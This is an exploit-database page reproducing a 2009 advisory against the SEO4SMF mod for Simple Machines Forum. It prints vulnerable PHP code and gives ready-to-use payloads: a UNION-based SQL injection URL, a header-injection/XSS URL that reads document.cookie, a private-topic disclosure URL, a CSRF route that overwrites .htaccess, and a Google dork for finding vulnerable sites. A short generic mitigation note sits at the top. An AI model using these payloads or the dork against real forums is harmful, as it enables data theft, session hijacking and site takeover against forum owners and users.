header-logo
Suggest Exploit
vendor:
by:
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Inyection SQL

The code provided shows multiple instances of SQL injection vulnerabilities in the application. The vulnerable code uses user input directly in SQL queries without proper sanitization or parameterization. This allows an attacker to manipulate the queries and potentially execute arbitrary SQL commands.

Mitigation:

To mitigate this vulnerability, the application should use parameterized queries or prepared statements to ensure that user input is properly sanitized and treated as data rather than executable code. Additionally, input validation and output encoding should be implemented to prevent other types of injection attacks such as XSS.
Source

Exploit-DB raw data:

[1] Inyection SQL

Linea 50 al 63
$query = db_query("
SELECT m.ID_TOPIC, m.subject ,b.ID_BOARD, b.name
FROM {$db_prefix}messages AS m, {$db_prefix}boards AS b
WHERE m.ID_TOPIC = *$topic*
AND m.ID_BOARD = b.ID_BOARD
IMIT 1", __FILE__, __LINE__);

------------------------------------------------------------------------

Linea 105 al 108
$query = db_query("
SELECT name FROM {$db_prefix}boards AS b
WHERE ID_BOARD = *$board*
LIMIT 1", __FILE__, __LINE__);

------------------------------------------------------------------------

Linea 125
$request = db_query("SELECT memberName FROM {$db_prefix}members where
ID_MEMBER=".*$user*." limit 1", __FILE__, __LINE__);

------------------------------------------------------------------------

Linea 143
$request = db_query("SELECT subject FROM {$db_prefix}tp_articles where
id=".*$tpage*." limit 1", __FILE__, __LINE__);

Where:

Linea 7 al 13
$topic = $_GET['t'];
$board = $_GET['b'];
$other = $_GET['o'];
$user = $_GET['u'];
$tpage = $_GET['p'];
$action = $_GET['a'];
$param = $_GET['param'];


Now execute the proof of concept:
http://localhost/smf/seo4smf-redirect.php?t=-1 union select 1,2,3…(numero de columnas)…,concat(username(),database()) –
GoogleDorks: http://www.google.cl/search?hl=es&q=allinurl%3Aseo4smf-redirect.php&btnG=Buscar+con+Google&meta=

[2] Inyection of headers, Cross site Scripting and Path disclosure:
Source:

if(!empty <http://www.php.net/empty>($url)){
header <http://www.php.net/header>('HTTP/1.1 301 Moved Permanently');
header <http://www.php.net/header>('Location: '.$url);
exit <http://www.php.net/exit>;
}


The proof of concept:
http://localhost/seo4smf-redirect.php?a=x%0DLocation:%20javascript:alert(document.cookie);
Real test: http://www.jccharry.com/archivos_publicos/xss_seo4smf.png
Or print the error with path disclosure.

[3] Disclosure in topics:
http://localhost/seo4smf-redirect.php?t=[number 1 to total topics].new/topicseen
This return the privates forumnames and topicnames.

[4] Cross site request forgery and inyection of arbitrary code
Source:
if (isset($_POST['htaccess']))
{
$htaccess = stripslashes($_POST['htaccess']);

//str_replace("\\\\","\\",$htaccess);
file_put_contents($boarddir."/.htaccess", $htaccess);
}
csrf -> .htaccess rewrited -> pwned!
and xml files.

exploits and more in
http://foro.elhacker.net/bugs_y_exploits/falla_en_el_mod_seo4smf_para_smf-t241029.0.html
and
http://www.jccharry.com/blog/2009/01/09/whk_fallas-criticas-en-seo4smf-para-foros-smf-simplemachines-forum.html

-={[unica_inc algún dia estaremos juntos]}=-

# milw0rm.com [2009-01-11]

Navigation

Suggest Exploit

Services By CQR